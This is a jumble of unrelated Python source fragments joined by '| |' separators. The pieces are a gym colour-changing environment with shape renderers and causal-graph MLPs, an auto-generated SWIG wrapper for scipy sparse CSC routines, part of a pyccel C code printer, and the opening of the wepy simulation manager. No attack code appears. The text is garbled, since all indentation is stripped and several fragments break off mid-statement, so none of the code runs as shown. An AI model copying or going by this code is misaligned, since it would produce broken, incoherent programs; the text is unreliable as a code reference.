diff1 = width // 3 - 1
diff2 = 2 * width // 3 + 1
rr = [r0 + width // 2, r0 + width, r0 + width, r0 + width // 2, r0]
cc = [c0, c0 + diff1, c0 + diff2, c0 + width, c0 + width // 2]
return skimage.draw.polygon(rr, cc, im_size)
def parallelogram(r0, c0, width, im_size):
rr, cc = [r0, r0 + width, r0 + width, r0], [c0, c0 + width // 2, c0 + width, c0 + width - width // 2]
return skimage.draw.polygon(rr, cc, im_size)
def scalene_triangle(r0, c0, width, im_size):
rr, cc = [r0, r0 + width, r0 + width//2], [c0 + width - width // 2, c0, c0 + width]
return skimage.draw.polygon(rr, cc, im_size)
def fig2rgb_array(fig):
fig.canvas.draw()
buffer = fig.canvas.tostring_rgb()
width, height = fig.canvas.get_width_height()
return np.fromstring(buffer, dtype=np.uint8).reshape(height, width, 3)
def render_cubes(objects, width):
voxels = np.zeros((width, width, width), dtype=np.bool)
colors = np.empty(voxels.shape, dtype=object)
cols = ['purple', 'green', 'orange', 'blue', 'brown']
for i, pos in objects.items():
voxels[pos[0], pos[1], 0] = True
colors[pos[0], pos[1], 0] = cols[i]
fig = plt.figure()
ax = Axes3D(fig)
ax.w_zaxis.set_pane_color((0.5, 0.5, 0.5, 1.0))
ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))
ax.w_yaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))
ax.w_zaxis.line.set_lw(0.)
ax.set_xticks([])
ax.set_yticks([])
ax.set_zticks([])
ax.voxels(voxels, facecolors=colors, edgecolor='k')
im = fig2rgb_array(fig)
plt.close(fig)
im = np.array( # Crop and resize
Image.fromarray(im[215:455, 80:570]).resize((50, 50), Image.ANTIALIAS))
return im / 255.
class MLP(nn.Module):
def __init__(self, dims):
super().__init__()
self.layers = []
for i in range(1, len(dims)):
self.layers.append(nn.Linear(dims[i-1], dims[i]))
torch.nn.init.orthogonal_(self.layers[-1].weight.data, 3.5)
torch.nn.init.uniform_(self.layers[-1].bias.data, -2.1, +2.1)
self.layers = nn.ModuleList(self.layers)
def forward(self, x, mask):
x = x * mask
for i, l in enumerate(self.layers):
if i == len(self.layers) - 1:
x = torch.softmax(l(x), dim = 1)
else:
x = torch.relu(l(x))
#print(x)
x = torch.distributions.one_hot_categorical.OneHotCategorical(probs = x).sample()
return x
@dataclass
class Coord:
x: int
y: int
def __add__(self, other):
return Coord(self.x + other.x,
self.y + other.y)
@dataclass
class Object:
pos: Coord
color: int
class ColorChanging(gym.Env):
"""Gym environment for block pushing task."""
def __init__(self, width=5, height=5, render_type='cubes',
*, num_objects=5,
num_colors=None, max_steps = 50, seed=None):
np.random.seed(0)
torch.manual_seed(0)
self.width = width
self.height = height
self.render_type = render_type
self.num_objects = num_objects
if num_colors is None:
num_colors = num_objects
self.num_colors = num_colors
self.num_actions = self.num_objects * self.num_colors
self.mlps = []
self.mask = None
colors = ['blue', 'green', 'yellow', 'white', 'red']
self.colors, _ = utils.get_colors_and_weights(cmap = 'Set1', num_colors = self.num_colors)#[mpl.colors.to_rgba(colors[i]) for i in range(self.num_colors)]
self.object_to_color = [torch.zeros(self.num_colors) for _ in range(self.num_objects)]
self.np_random = None
self.game = None
self.target = None
# Initialize to pos outside of env for easier collision resolution.
self.objects = OrderedDict()
self.adjacency_matrix = None
mlp_dims = [self.num_objects * self.num_colors, 4 * self.num_objects * self.num_colors, self.num_colors]
self.mlps = []
for i in range(self.num_objects):
self.mlps.append(MLP(mlp_dims))
num_nodes = self.num_objects
num_edges = np.random.randint(num_nodes, (((num_nodes) * (num_nodes - 1)) // 2) + 1)
#if graph is None:
self.adjacency_matrix = random_dag(num_nodes, num_edges)
#else:
# self.adjacency_matrix = random_dag(num_nodes, num_nodes, g = graph)
self.adjacency_matrix = torch.from_numpy(self.adjacency_matrix).float()
# Generate masks so that each variable only recieves input from its parents.
self.generate_masks()
# If True, then check for collisions and don't allow two
# objects to occupy the same position.
self.collisions = True
self.action_space = spaces.Discrete(self.num_actions)
self.observation_space = spaces.Box(
low=0, high=1,
shape=(3, self.width, self.height),
dtype=np.float32
)
self.seed(seed)
self.reset()
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def render_grid(self):
im = np.zeros((3, self.width, self.height))
for idx, obj in self.objects.items():
im[:, obj.pos.x, obj.pos.y] = self.colors[obj.color][:3]
return im
def render_circles(self):
im = np.zeros((self.width * 10, self.height * 10, 3), dtype=np.float32)
for idx, obj in self.objects.items():
rr, cc = skimage.draw.circle(
obj.pos.x * 10 + 5, obj.pos.y * 10 + 5, 5, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
return im.transpose([2, 0, 1])
def render_shapes(self):
im = np.zeros((self.width * 10, self.height * 10, 3), dtype=np.float32)
for idx, obj in self.objects.items():
if idx == 0:
rr, cc = skimage.draw.circle(
obj.pos.x * 10 + 5, obj.pos.y * 10 + 5, 5, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 1:
rr, cc = triangle(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 2:
rr, cc = square(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 3:
rr, cc = diamond(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 4:
rr, cc = pentagon(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 5:
rr, cc = cross(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 6:
rr, cc = parallelogram(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
else:
rr, cc = scalene_triangle(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
return im.transpose([2, 0, 1])
def render_cubes(self):
im = render_cubes(self.objects, self.width)
return im.transpose([2, 0, 1])
def render(self):
return dict(
grid=self.render_grid,
circles=self.render_circles,
shapes=self.render_shapes,
cubes=self.render_cubes,
)[self.render_type]()
def get_state(self):
im = np.zeros(
(self.num_objects * self.num_colors, self.width, self.height), dtype=np.int32)
for idx, obj in self.objects.items():
im[idx * self.num_colors + obj.color, obj.pos.x, obj.pos.y] = 1
return im
def generate_masks(self):
mask = self.adjacency_matrix.unsqueeze(-1)
mask = mask.repeat(1, 1, self.num_colors)
self.mask = mask.view(self.adjacency_matrix.size(0), -1)
def reset(self, graph = None):
self.object_to_color = [torch.zeros(self.num_colors) for _ in range(self.num_objects)]
# Sample color for root node randomly
root_color = np.random.randint(0, self.num_colors)
self.object_to_color[0][root_color] = 1
# Sample color for other nodes using MLPs
self.sample_variables(0, do_everything = True)
self.objects = OrderedDict()
# Randomize | |
<reponame>tomspur/scipy
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.10
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_csc', [dirname(__file__)])
except ImportError:
import _csc
return _csc
if fp is not None:
try:
_mod = imp.load_module('_csc', fp, pathname, description)
finally:
fp.close()
return _mod
_csc = swig_import_helper()
del swig_import_helper
else:
import _csc
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def csc_matmat_pass1(*args):
"""
csc_matmat_pass1(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
npy_int32 const [] Bp, npy_int32 const [] Bi, npy_int32 [] Cp)
csc_matmat_pass1(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Ai,
npy_int64 const [] Bp, npy_int64 const [] Bi, npy_int64 [] Cp)
"""
return _csc.csc_matmat_pass1(*args)
def csc_diagonal(*args):
"""
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
npy_bool_wrapper const [] Ax, npy_bool_wrapper [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
signed char const [] Ax, signed char [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
unsigned char const [] Ax, unsigned char [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
short const [] Ax, short [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
unsigned short const [] Ax, unsigned short [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
int const [] Ax, int [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
unsigned int const [] Ax, unsigned int [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
long long const [] Ax, long long [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
unsigned long long const [] Ax, unsigned long long [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
float const [] Ax, float [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
double const [] Ax, double [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
long double const [] Ax, long double [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
npy_cfloat_wrapper const [] Ax, npy_cfloat_wrapper [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
npy_cdouble_wrapper const [] Ax, npy_cdouble_wrapper [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
npy_clongdouble_wrapper const [] Ax, npy_clongdouble_wrapper [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
npy_bool_wrapper const [] Ax, npy_bool_wrapper [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
signed char const [] Ax, signed char [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
unsigned char const [] Ax, unsigned char [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
short const [] Ax, short [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
unsigned short const [] Ax, unsigned short [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
int const [] Ax, int [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
unsigned int const [] Ax, unsigned int [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
long long const [] Ax, long long [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
unsigned long long const [] Ax, unsigned long long [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
float const [] Ax, float [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
double const [] Ax, double [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
long double const [] Ax, long double [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
npy_cfloat_wrapper const [] Ax, npy_cfloat_wrapper [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
npy_cdouble_wrapper const [] Ax, npy_cdouble_wrapper [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
npy_clongdouble_wrapper const [] Ax, npy_clongdouble_wrapper [] Yx)
"""
return _csc.csc_diagonal(*args)
def csc_tocsr(*args):
"""
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
npy_bool_wrapper const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj,
npy_bool_wrapper [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
signed char const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, signed char [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
unsigned char const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, unsigned char [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
short const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, short [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
unsigned short const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, unsigned short [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
int const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, int [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
unsigned int const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, unsigned int [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
long long const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, long long [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
unsigned long long const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj,
unsigned long long [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
float const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, float [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
double const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, double [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const | |
[Declare(i.dtype, i)]
elif not isinstance(i, Variable):
decs += [FuncAddressDeclare(i)]
decs += [Declare(i.dtype, i) for i in self._additional_declare]
decs = ''.join(self._print(i) for i in decs)
self._additional_declare.clear()
sep = self._print(SeparatorComment(40))
if self._additional_args :
self._additional_args.pop()
imports = ''.join(self._print(i) for i in expr.imports)
doc_string = self._print(expr.doc_string) if expr.doc_string else ''
parts = [sep,
doc_string,
'{signature}\n{{\n'.format(signature=self.function_signature(expr)),
imports,
decs,
body,
'}\n',
sep]
return ''.join(p for p in parts if p)
def stored_in_c_pointer(self, a):
"""
Indicates whether the object a needs to be stored in a pointer
in c code
Parameters
----------
a : Variable/FunctionAddress
"""
if not isinstance(a, Variable):
return False
return (a.is_pointer and not a.is_ndarray) or a.is_optional or \
any(a is bi for b in self._additional_args for bi in b)
def create_tmp_var(self, match_var):
tmp_var_name = self._parser.get_new_name('tmp')
tmp_var = Variable(name = tmp_var_name, dtype = match_var.dtype)
self._additional_declare.append(tmp_var)
return tmp_var
def _print_FunctionCall(self, expr):
func = expr.funcdef
# Ensure the correct syntax is used for pointers
args = []
for a, f in zip(expr.args, func.arguments):
a = a.value if a else Nil()
f = f.var
if isinstance(a, Variable) and self.stored_in_c_pointer(f):
args.append(VariableAddress(a))
elif f.is_optional and not isinstance(a, Nil):
tmp_var = self.create_tmp_var(f)
assign = Assign(tmp_var, a)
self._additional_code += self._print(assign) + '\n'
args.append(VariableAddress(tmp_var))
else :
args.append(a)
args += self._temporary_args
self._temporary_args = []
args = ', '.join(['{}'.format(self._print(a)) for a in args])
if not func.results:
return '{}({});\n'.format(func.name, args)
return '{}({})'.format(func.name, args)
def _print_Constant(self, expr):
""" Convert a Python expression with a math constant call to C
function call
Parameters
----------
expr : Pyccel ast node
Python expression with a Math constant
Returns
-------
string
String represent the value of the constant
Example
-------
math.pi ==> 3.14159265358979
"""
val = LiteralFloat(expr.value)
return self._print(val)
def _print_Return(self, expr):
code = ''
args = [VariableAddress(a) if self.stored_in_c_pointer(a) else a for a in expr.expr]
if len(args) == 0:
return 'return;\n'
if len(args) > 1:
if expr.stmt:
return self._print(expr.stmt)+'\n'+'return 0;\n'
return 'return 0;\n'
if expr.stmt:
# get Assign nodes from the CodeBlock object expr.stmt.
last_assign = expr.stmt.get_attribute_nodes(Assign, excluded_nodes=FunctionCall)
deallocate_nodes = expr.stmt.get_attribute_nodes(Deallocate, excluded_nodes=(Assign,))
vars_in_deallocate_nodes = [i.variable for i in deallocate_nodes]
# Check the Assign objects list in case of
# the user assigns a variable to an object contains IndexedElement object.
if not last_assign:
return 'return {0};\n'.format(self._print(args[0]))
# make sure that stmt contains one assign node.
last_assign = last_assign[-1]
variables = last_assign.rhs.get_attribute_nodes(Variable, excluded_nodes=(FunctionDef,))
unneeded_var = not any(b in vars_in_deallocate_nodes for b in variables)
if unneeded_var:
code = ''.join(self._print(a) for a in expr.stmt.body if a is not last_assign)
return code + '\nreturn {};\n'.format(self._print(last_assign.rhs))
else:
code = ''+self._print(expr.stmt)
self._additional_declare.append(last_assign.lhs)
return code + 'return {0};\n'.format(self._print(args[0]))
def _print_Pass(self, expr):
return '// pass\n'
def _print_Nil(self, expr):
return 'NULL'
def _print_PyccelAdd(self, expr):
return ' + '.join(self._print(a) for a in expr.args)
def _print_PyccelMinus(self, expr):
args = [self._print(a) for a in expr.args]
if len(args) == 1:
return '-{}'.format(args[0])
return ' - '.join(args)
def _print_PyccelMul(self, expr):
return ' * '.join(self._print(a) for a in expr.args)
def _print_PyccelDiv(self, expr):
if all(a.dtype is NativeInteger() for a in expr.args):
args = [NumpyFloat(a) for a in expr.args]
else:
args = expr.args
return ' / '.join(self._print(a) for a in args)
def _print_PyccelFloorDiv(self, expr):
self._additional_imports.add("math")
# the result type of the floor division is dependent on the arguments
# type, if all arguments are integers the result is integer otherwise
# the result type is float
need_to_cast = all(a.dtype is NativeInteger() for a in expr.args)
code = ' / '.join(self._print(a if a.dtype is NativeReal() else NumpyFloat(a)) for a in expr.args)
if (need_to_cast):
cast_type = self.find_in_dtype_registry('int', expr.precision)
return "({})floor({})".format(cast_type, code)
return "floor({})".format(code)
def _print_PyccelRShift(self, expr):
return ' >> '.join(self._print(a) for a in expr.args)
def _print_PyccelLShift(self, expr):
return ' << '.join(self._print(a) for a in expr.args)
def _print_PyccelBitXor(self, expr):
if expr.dtype is NativeBool():
return '{0} != {1}'.format(self._print(expr.args[0]), self._print(expr.args[1]))
return ' ^ '.join(self._print(a) for a in expr.args)
def _print_PyccelBitOr(self, expr):
if expr.dtype is NativeBool():
return ' || '.join(self._print(a) for a in expr.args)
return ' | '.join(self._print(a) for a in expr.args)
def _print_PyccelBitAnd(self, expr):
if expr.dtype is NativeBool():
return ' && '.join(self._print(a) for a in expr.args)
return ' & '.join(self._print(a) for a in expr.args)
def _print_PyccelInvert(self, expr):
return '~{}'.format(self._print(expr.args[0]))
def _print_PyccelAssociativeParenthesis(self, expr):
return '({})'.format(self._print(expr.args[0]))
def _print_PyccelUnary(self, expr):
return '+{}'.format(self._print(expr.args[0]))
def _print_PyccelUnarySub(self, expr):
return '-{}'.format(self._print(expr.args[0]))
def _print_AugAssign(self, expr):
lhs_code = self._print(expr.lhs)
op = expr.op
rhs_code = self._print(expr.rhs)
return "{0} {1}= {2};\n".format(lhs_code, op, rhs_code)
def _print_Assign(self, expr):
prefix_code = ''
lhs = expr.lhs
rhs = expr.rhs
if isinstance(lhs, Variable) and lhs.is_optional:
if lhs in self._optional_partners:
# Collect temporary variable which provides
# allocated memory space for this optional variable
tmp_var = self._optional_partners[lhs]
else:
# Create temporary variable to provide allocated
# memory space before assigning to the pointer value
# (may be NULL)
tmp_var_name = self._parser.get_new_name()
tmp_var = lhs.clone(tmp_var_name, is_optional=False)
self._additional_declare.append(tmp_var)
self._optional_partners[lhs] = tmp_var
# Point optional variable at an allocated memory space
prefix_code = self._print(AliasAssign(lhs, tmp_var))
if isinstance(rhs, FunctionCall) and isinstance(rhs.dtype, NativeTuple):
self._temporary_args = [VariableAddress(a) for a in lhs]
return prefix_code+'{};\n'.format(self._print(rhs))
# Inhomogenous tuples are unravelled and therefore do not exist in the c printer
if isinstance(rhs, (NumpyArray, PythonTuple)):
return prefix_code+self.copy_NumpyArray_Data(expr)
if isinstance(rhs, (NumpyFull)):
return prefix_code+self.arrayFill(expr)
if isinstance(rhs, NumpyArange):
return prefix_code+self.fill_NumpyArange(rhs, lhs)
lhs = self._print(expr.lhs)
rhs = self._print(expr.rhs)
return prefix_code+'{} = {};\n'.format(lhs, rhs)
def _print_AliasAssign(self, expr):
lhs_var = expr.lhs
rhs_var = expr.rhs
lhs = VariableAddress(lhs_var)
rhs = VariableAddress(rhs_var) if isinstance(rhs_var, Variable) else rhs_var
lhs = self._print(lhs)
rhs = self._print(rhs)
# the below condition handles the case of reassinging a pointer to an array view.
# setting the pointer's is_view attribute to false so it can be ignored by the free_pointer function.
if isinstance(lhs_var, Variable) and lhs_var.is_ndarray \
and isinstance(rhs_var, Variable) and rhs_var.is_ndarray:
if lhs_var.order == rhs_var.order:
return 'alias_assign(&{}, {});\n'.format(lhs, rhs)
else:
return 'transpose_alias_assign(&{}, {});\n'.format(lhs, rhs)
return '{} = {};\n'.format(lhs, rhs)
def _print_For(self, expr):
indices = expr.iterable.loop_counters
index = indices[0] if indices else expr.target
if expr.iterable.num_loop_counters_required:
self._additional_declare.append(index)
target = index
iterable = expr.iterable.get_range()
if not isinstance(iterable, PythonRange):
# Only iterable currently supported is PythonRange
errors.report(PYCCEL_RESTRICTION_TODO, symbol=expr,
severity='fatal')
counter = self._print(target)
body = self._print(expr.body)
additional_assign = CodeBlock(expr.iterable.get_assigns(expr.target))
body = self._print(additional_assign) + body
start = self._print(iterable.start)
stop = self._print(iterable.stop )
step = self._print(iterable.step )
test_step = iterable.step
if isinstance(test_step, PyccelUnarySub):
test_step = iterable.step.args[0]
# testing if the step is a value or an expression
if isinstance(test_step, Literal):
op = '>' if isinstance(iterable.step, PyccelUnarySub) else '<'
return ('for ({counter} = {start}; {counter} {op} {stop}; {counter} += '
'{step})\n{{\n{body}}}\n').format(counter=counter, start=start, op=op,
stop=stop, step=step, body=body)
else:
return (
'for ({counter} = {start}; ({step} > 0) ? ({counter} < {stop}) : ({counter} > {stop}); {counter} += '
'{step})\n{{\n{body}}}\n').format(counter=counter, start=start,
stop=stop, step=step, body=body)
def _print_FunctionalFor(self, expr):
loops = ''.join(self._print(i) for i in expr.loops)
return loops
def _print_CodeBlock(self, expr):
if not expr.unravelled:
body_exprs, new_vars = expand_to_loops(expr, self._parser.get_new_variable, language_has_vectors = False)
self._additional_declare.extend(new_vars)
else:
body_exprs = expr.body
body_stmts = []
for b in body_exprs :
code = self._print(b)
code = self._additional_code + code
self._additional_code = ''
body_stmts.append(code)
return ''.join(self._print(b) for b in body_stmts)
def _print_Idx(self, expr):
return self._print(expr.label)
def _print_Exp1(self, expr):
return "M_E"
def _print_Pi(self, expr):
return 'M_PI'
def _print_Infinity(self, expr):
return 'HUGE_VAL'
def _print_NegativeInfinity(self, expr):
return '-HUGE_VAL'
def _print_PythonReal(self, expr):
return 'creal({})'.format(self._print(expr.internal_var))
def _print_PythonImag(self, expr):
return 'cimag({})'.format(self._print(expr.internal_var))
def _handle_is_operator(self, Op, expr):
lhs = self._print(expr.lhs)
rhs = self._print(expr.rhs)
a = expr.args[0]
b = expr.args[1]
if Nil() in expr.args:
lhs = VariableAddress(expr.lhs) if isinstance(expr.lhs, Variable) else expr.lhs
rhs = VariableAddress(expr.rhs) if isinstance(expr.rhs, Variable) else expr.rhs
lhs = self._print(lhs)
rhs = self._print(rhs)
return '{} {} {}'.format(lhs, Op, rhs)
if (a.dtype is NativeBool() and b.dtype is NativeBool()):
return '{} {} {}'.format(lhs, Op, rhs)
else:
errors.report(PYCCEL_RESTRICTION_IS_ISNOT,
symbol=expr, severity='fatal')
def _print_PyccelIsNot(self, expr):
return self._handle_is_operator("!=", expr)
def _print_PyccelIs(self, expr):
return self._handle_is_operator("==", expr)
def _print_Piecewise(self, expr):
if expr.args[-1].cond is not True:
# We need the last conditional to be a True, otherwise the resulting
# function may not return a result.
raise ValueError("All Piecewise expressions must contain an "
"(expr, True) statement to be used as a default "
"condition. Without one, the generated "
"expression may not evaluate to anything | |
"""Module for the main simulation management class.
All component class interfaces are set by how the manager interacts
with them.
Managers should implement a three phase protocol for running
simulations:
- init
- run_simulation
- cleanup
The separate `init` method is different than the constructor
`__init__` method and instead calls the special `init` method on all
wepy components (runner, resampler, boundary conditions, and
reporters) at runtime.
This allows for a things that need to be done at runtime before a
simulation begins, e.g. opening files, that you don't want done at
construction time.
This is useful for orchestration because the complete simulation
'image' can be made before runtime (and pickled or otherwise
persisted) without producing external effects.
This is used primarily for reporters, which perform I/O, and work
mappers which may spawn processes.
The `cleanup` method should be called either when the simulation ends
normally as well as when the simulation ends abnormally.
This allows file handles to be closed and processes to be killed at
the end of a simulation and upon failure.
The base methods for running simulations is `run_cycle` which runs
a cycle of weighted ensemble given the state of all the components.
The simulation manager should provide multiple ways of running
simulations depending on if the number of cycles is known up front or
to be determined adaptively (e.g. according to some time limit).
"""
import numpy as np
import sys
import time
from copy import deepcopy
import logging
from wepy.work_mapper.mapper import Mapper
class Manager(object):
"""The class that coordinates wepy simulations.
The Manager class is the lynchpin of wepy simulations and is where
all the different components are composed.
Strictly speaking the Manager defines the interfaces each
component must provide to function.
Developers can call `run_cycle` directly but the following
convenience functions are provided to run many cycles in
succession as a single 'run' with consecutive cycle idxs:
- run_simulation_by_time
- run_simulation
The corresponding 'continue' run methods will simply pass a run
index to reporters indicating that the run continues another.
For these run methods the `init` method is called followed by
iterative calls to `run_cycle` and finally with a call to
`cleanup`.
The order of application of wepy components are:
- runner
- boundary_conditions
- resampler
- reporters
"""
REPORT_ITEM_KEYS = ('cycle_idx', 'n_segment_steps',
'new_walkers', 'resampled_walkers',
'warp_data', 'bc_data', 'progress_data',
'resampling_data', 'resampler_data',
'worker_segment_times', 'cycle_runner_time',
'cycle_bc_time', 'cycle_resampling_time',)
"""Keys of values that will be passed to reporters.
This indicates the values that the reporters will have access to.
"""
def __init__(self, init_walkers,
runner = None,
work_mapper = None,
resampler = None,
boundary_conditions = None,
reporters = None):
"""Constructor for Manager.
Arguments
---------
init_walkers : list of walkers
The list of the initial walkers that will be run.
runner : object implementing the Runner interface
The runner to be used for propagating sampling segments of walkers.
work_mapper : object implementing the WorkMapper interface
The object that will be used to perform a set of runner
segments in a cycle.
resampler : object implementing the Resampler interface
The resampler to be used in the simulation
boundary_conditions : object implementing BoundaryCondition interface, optional
The boundary conditions to apply to walkers
reporters : list of objects implenting the Reporter interface, optional
Reporters to be used. You should provide these if you want to keep data.
Warnings
--------
While reporters are strictly optional, you probably want to
provide some because the simulation manager provides no
utilities for saving data from the simulations except for the
walkers at the end of a cycle or simulation.
See Also
--------
wepy.reporter.hdf5 : The standard reporter for molecular simulations in wepy.
wepy.orchestration.orchestrator.Orchestrator : for running simulations with
checkpointing, restarting, reporter localization, and configuration hotswapping
with command line interface.
"""
self.init_walkers = init_walkers
self.n_init_walkers = len(init_walkers)
# the runner is the object that runs dynamics
self.runner = runner
# the resampler
self.resampler = resampler
# object for boundary conditions
self.boundary_conditions = boundary_conditions
# the method for writing output
if reporters is None:
self.reporters = []
else:
self.reporters = reporters
if work_mapper is None:
self.work_mapper = Mapper()
else:
self.work_mapper = work_mapper
def run_segment(self, walkers, segment_length, cycle_idx):
"""Run a time segment for all walkers using the available workers.
